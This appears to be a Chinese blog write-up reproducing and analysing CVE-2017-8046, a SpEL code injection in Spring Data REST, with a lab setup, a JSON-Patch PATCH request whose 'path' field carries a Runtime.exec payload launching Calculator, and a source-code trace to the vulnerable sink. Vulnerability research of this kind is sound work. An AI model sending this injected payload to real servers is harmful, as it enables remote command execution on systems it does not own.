环境搭建

使用的项目为https://github.com/spring-guides/gs-accessing-data-rest.git里面的complete,直接用IDEA导入,并修改pom.xml中版本信息为漏洞版本。这里改为1.5.6。

之前尝试搭建了另一个验证环境,但是修改版本后加载一直报错,不知道是什么原因,写完在研究下。

直接运行,默认端口8080,访问http://localhost:8080/

people类有两个属性,firstName和lastName

 package hello;

 import javax.persistence.Entity;

 import javax.persistence.GeneratedValue;

 import javax.persistence.GenerationType;

 import javax.persistence.Id;

 @Entity

 public class Person {

     @Id

     @GeneratedValue(strategy = GenerationType.AUTO)

     private long id;

     private String firstName;

     private String lastName;

     public String getFirstName() {

         return firstName;

     }

     public void setFirstName(String firstName) {

         this.firstName = firstName;

     }

     public String getLastName() {

         return lastName;

     }

     public void setLastName(String lastName) {

         this.lastName = lastName;

     }

 }

根据rest api规定,用POST请求新建一个people,请求如下

POST /people HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 32

{"firstName":"w","lastName":"q"}

此时已创建一个people对象,通过GET请求可以访问对象

漏洞复现

需要用PATCH方法,而且请求格式为JSON。根据RFC 6902,发送JSON文档结构需要注意以下两点:

1、请求头为Content-Type: application/json-patch+json

2、需要参数op、路径path,其中op所支持的方法很多,如test,add,replace等,path参数则必须使用斜杠分割

这样我们就可以构造payload了

PATCH /people/1 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type:application/json-patch+json
Upgrade-Insecure-Requests: 1
Content-Length: 256

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{111,112,101,110,32,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112}))/lastName", "value": "vulhub" }]

参数path存在代码注入,可执行系统命令,这里运行的命令是open /Applications/Calculator.app,成功弹出计算器

漏洞分析

入口文件是位于org.springframework.data.rest.webmvc.config.JsonPatchHandler:apply()

通过request.isJsonPatchRequest确定是PATCH请求之后,调用applyPatch(request.getBody(), target);。其中isJsonPatchRequest的判断方法是

 public boolean isJsonPatchRequest() {

     // public static final MediaType JSON_PATCH_JSON = MediaType.valueOf("application/json-patch+json");

     return isPatchRequest() && RestMediaTypes.JSON_PATCH_JSON.isCompatibleWith(contentType);

 }

所以这就要求我们使用PATCH方法时,contentType要为application/json-patch+json。

继续跟踪进入到applyPatch()方法中:

 <T> T applyPatch(InputStream source, T target) throws Exception {

     return getPatchOperations(source).apply(target, (Class<T>) target.getClass());

 }

继续跟踪进入到getPatchOperations()中:

 private Patch getPatchOperations(InputStream source) {

     try {

         return new JsonPatchPatchConverter(mapper).convert(mapper.readTree(source));

     } catch (Exception o_O) {

         throw new HttpMessageNotReadableException(

                 String.format("Could not read PATCH operations! Expected %s!", RestMediaTypes.JSON_PATCH_JSON), o_O);

     }

 }

利用mapper初始化JsonPatchPatchConverter()对象之后调用convert()方法。跟踪org.springframework.data.rest.webmvc.json.patch.JsonPatchPatchConverter:convert()方法

 public Patch convert(JsonNode jsonNode) {

         if (!(jsonNode instanceof ArrayNode)) {

             throw new IllegalArgumentException("JsonNode must be an instance of ArrayNode");

         } else {

             ArrayNode opNodes = (ArrayNode)jsonNode;

             List<PatchOperation> ops = new ArrayList(opNodes.size());

             Iterator elements = opNodes.elements();

             while(elements.hasNext()) {

                 JsonNode opNode = (JsonNode)elements.next();

                 String opType = opNode.get("op").textValue();

                 String path = opNode.get("path").textValue();

                 JsonNode valueNode = opNode.get("value");

                 Object value = this.valueFromJsonNode(path, valueNode);

                 String from = opNode.has("from") ? opNode.get("from").textValue() : null;

                 if (opType.equals("test")) {

                     ops.add(new TestOperation(path, value));

                 } else if (opType.equals("replace")) {

                     ops.add(new ReplaceOperation(path, value));

                 } else if (opType.equals("remove")) {

                     ops.add(new RemoveOperation(path));

                 } else if (opType.equals("add")) {

                     ops.add(new AddOperation(path, value));

                 } else if (opType.equals("copy")) {

                     ops.add(new CopyOperation(path, from));

                 } else {

                     if (!opType.equals("move")) {

                         throw new PatchException("Unrecognized operation type: " + opType);

                     }

                     ops.add(new MoveOperation(path, from));

                 }

             }

             return new Patch(ops);

         }

     }

convert()方法返回Patch()对象,其中的ops包含了我们的payload。进入到org.springframework.data.rest.webmvc.json.patch.Patch中,

 public Patch(List<PatchOperation> operations) {

     this.operations = operations;

 }

通过上一步地分析,ops是一个List<PatchOperation>对象,每一个PatchOperation对象中包含了op、path、value三个内容。进入到PatchOperation分析其赋值情况

 public PatchOperation(String op, String path, Object value) {

     this.op = op;

     this.path = path;

     this.value = value;

     this.spelExpression = pathToExpression(path);

 }

进入到pathToExpression()中

 public static Expression pathToExpression(String path) {

     return SPEL_EXPRESSION_PARSER.parseExpression(pathToSpEL(path));

 }

可以看到这是一个SPEL表达式解析操作,但是在解析之前调用了pathToSpEL()。进入到pathToSpEL()中。

 private static String pathToSpEL(String path) {

     return pathNodesToSpEL(path.split("\\/"));          // 使用/分割路径

 }

 private static String pathNodesToSpEL(String[] pathNodes) {

     StringBuilder spelBuilder = new StringBuilder();

     for (int i = 0; i < pathNodes.length; i++) {

         String pathNode = pathNodes[i];

         if (pathNode.length() == 0) {

             continue;

         }

         if (APPEND_CHARACTERS.contains(pathNode)) {

             if (spelBuilder.length() > 0) {

                 spelBuilder.append(".");            // 使用.重新组合路径

             }

             spelBuilder.append("$[true]");

             continue;

         }

         try {

             int index = Integer.parseInt(pathNode);

             spelBuilder.append('[').append(index).append(']');

         } catch (NumberFormatException e) {

             if (spelBuilder.length() > 0) {

                 spelBuilder.append('.');

             }

             spelBuilder.append(pathNode);

         }

     }

     String spel = spelBuilder.toString();

     if (spel.length() == 0) {

         spel = "#this";

     }

     return spel;

 }

重新回到org.springframework.data.rest.webmvc.config.JsonPatchHandler:applyPatch()中,

 T applyPatch(InputStream source, T target) throws Exception {

     return getPatchOperations(source).apply(target, (Class<T>) target.getClass());

 }

实际上PatchOperation是一个抽象类,实际上应该调用其实现类的perform()方法。通过动态调试分析,此时的operation实际是ReplaceOperation类的实例(这也和我们传入的replace操作是对应的)。进入到ReplaceOperation:perform()中,

 <T> void perform(Object target, Class<T> type) {

     setValueOnTarget(target, evaluateValueFromTarget(target, type));

 }

 protected void setValueOnTarget(Object target, Object value) {

     spelExpression.setValue(target, value);

 }

在setValueOnTarget()中会调用spelExpression对spel表示式进行解析,从而触发漏洞。

漏洞验证

明天用pocsuite写下poc,现在困了。

												


											
CVE-2017-8046 复现与分析的更多相关文章
	

    
						
  1. CVE-2020-1947  Sharding-UI的反序列化复现及分析
		
    CVE-2020-1947 复现及分析 0x01 影响 Apache ShardingSphere < =4.0.0 0x02 环境搭建 incubator-shardingsphere 的ui ...
    
		
    2. 
						
  2. CVE¬-2020-¬0796 漏洞复现(本地提权)
		
    CVE­-2020-­0796 漏洞复现(本地提权) 0X00漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品 ...
    
		
    3. 
						
  3. CVE-2020-2883漏洞复现&&流量分析
		
    CVE-2020-2883漏洞复现&&流量分析 写在前面 网上大佬说CVE-2020-2883是CVE-2020-2555的绕过,下面就复现了抓包看看吧. 一.准备环境 靶机:win7 ...
    
		
    4. 
						
  4. 【vulhub】Weblogic CVE-2017-10271漏洞复现&&流量分析
		
    Weblogic CVE-2017-10271 漏洞复现&&流量分析 Weblogic CVE-2017-10271 XMLDecoder反序列化 1.Weblogic-XMLDeco ...
    
		
    5. 
						
  5. CVE-2020-2555漏洞复现&&流量分析
		
    CVE-2020-2555漏洞复现&&流量分析 一.准备环境 windows7: weblogic 12.2.1.4.0 JDK版本为jdk-8u261 关于weblogic搭建可以看 ...
    
		
    6. 
						
  6. CVE 2021-44228 Log4j-2命令执行复现及分析
		
    12月11日:Apache Log4j2官方发布了2.15.0 版本,以修复CVE-2021-44228.虽然 2.15.0 版本解决了Message Lookups功能和JNDI 访问方式的问题,但 ...
    
		
    7. 
								
  7. Ecshop 2.x_3.x SQL注入和代码执行漏洞复现和分析
		
    0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来源于HT ...
    
		
    8. 
						
  8. 关于flink的时间处理不正确的现象复现&原因分析
		
    跟朋友聊天,说输出的时间不对,之前测试没关注到这个,然后就在processing模式下看了下,发现时间确实不正确 然后就debug,看问题在哪,最终分析出了原因,记录如下:    最下面给出了复现方案 ...
    
		
    9. 
						
  9. CVE 2019-0708漏洞复现防御修复
		
    CVE-2019-0708 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708.攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息.执行远程代码.发 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Spring Boot + MyBatis + Druid + Redis  + Thymeleaf 整合小结
			
    Spring Boot + MyBatis + Druid + Redis + Thymeleaf 整合小结 这两天闲着没事想利用**Spring Boot**加上阿里的开源数据连接池**Druid* ...
    
			
    2. 
						
  2. git 回退远端提交的三种方法
			
    git push -f origin XXX(远程分支名) 重新提交一个新的提交.(优先使用这个方式) revert 手动revert 删掉远程分支,再推一个本地分支上去.
    
			
    3. 
						
  3. Extjs checkbox数值回显
			
    昨天上午花了半天时间都在调 extjs的编辑页面里的CheckBox的回显问题,一直没搞定,毕竟我接触extjs才一个月不到,属于小白.先上个图: 这就是编辑页面的时候,需要的效果.然后我代码里是用了 ...
    
			
    4. 
						
  4. SQL索引的优缺点
			
    --索引的优点 /* (1)创建唯一索引,保证数据库表中每一行数据的唯一性 (2)大大加速数据的检索速度,这也是创建索引的最主要的原因 (3)加速表和表至今的连接,特别是在实现数据的参考完整性特别有意 ...
    
			
    5. 
						
  5. 使用 Vuejs 开发 chrome 插件的注意事项
			
    使用 Vuejs 开发 chrome 插件 chrome 插件的开发其实并不难,web开发者可以使用 html, css, javascript 轻松的开发实用的 chrome 插件. 一个好的 ch ...
    
			
    6. 
						
  6. 解决ie6、ie7下float为right换行的情况
			
    IE6下有不少奇怪的Bug,今天就碰到一个,float:right换行bug,情况是并列的几个块级元素如div和span,一些设置了左浮动一些设置右浮动,一行的宽度足够放下所有的块级元素,但此时ie6 ...
    
			
    7. 
						
  7. javaSE——简单的文件浏览器
			
    import java.io.File; public class Demo02 { public static void main(String[]args){ File file = new Fi ...
    
			
    8. 
						
  8. maven 骨架命令行创建
			
    项目的骨架maven 约定在项目的根目录下放置pom.xml,在src/main/java目录下放置主代码,在src/test/java下放置项目的测试代码. 这些基本的目录结构和pom.xml文件的 ...
    
			
    9. 
						
  9. fastdfs搭建和使用
			
    目录 前言 安装 安装插件 tracker storage 用自带的 client 进行测试 想要查看结果必须安装nginx 使用示例 引用 配置 使用 前言 参考网址 错误处理 安装 安装插件 yu ...
    
			
    10. 
						
  10. Breathing During Sleep
			
    TPO24-2 Breathing During Sleep Of all the physiological differences in human sleep compared with wak ...
    
			
    11.